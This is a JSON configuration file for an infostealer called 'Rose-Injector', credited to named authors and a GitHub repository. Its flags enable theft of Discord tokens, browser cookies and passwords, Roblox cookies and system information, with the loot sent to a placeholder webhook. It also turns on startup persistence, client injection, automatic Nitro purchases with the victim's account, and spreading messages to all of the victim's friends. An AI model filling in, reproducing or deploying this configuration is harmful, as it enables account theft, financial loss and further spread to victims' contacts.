{
"HOOK": "WEBHOOK_HERE",

"PING_METHOD": "NO_MESSAGE//NO_PING//EVERYONE//HERE",
"STARTUP": true,
"INJECTION": true,
"DISCORD_TOKEN_STEALING": true,
"BROWSER_COOKIE_STEALING": true,
"BROWSER_PASSWORD_STEALING": true,
"ROBLOX_COOKIE_STEALING": true,
"SYSTEM_INFORMATION_STEALING": true,
"AUTO_BUY_NITRO": true,
"MESSAGE_ALL_FRIENDS": true,
"MESSAGE_THAT_IS_BEING_SENT_TO_ALL_FRIENDS": "MESSAGE_HERE",

"EB_FOOTER": "Rose-Injector | Made by Gumbobrot, ICExFS, suegdu | https://github.com/DamagingRose/Rose-Injector/",
"EB_COLOR": 16711680,
"WH_AVATAR": "https://i.imgur.com/EZFAJXh.png",
"WH_NAME": "Rose-Injector",
  
"DEBUG_MODE": true
}
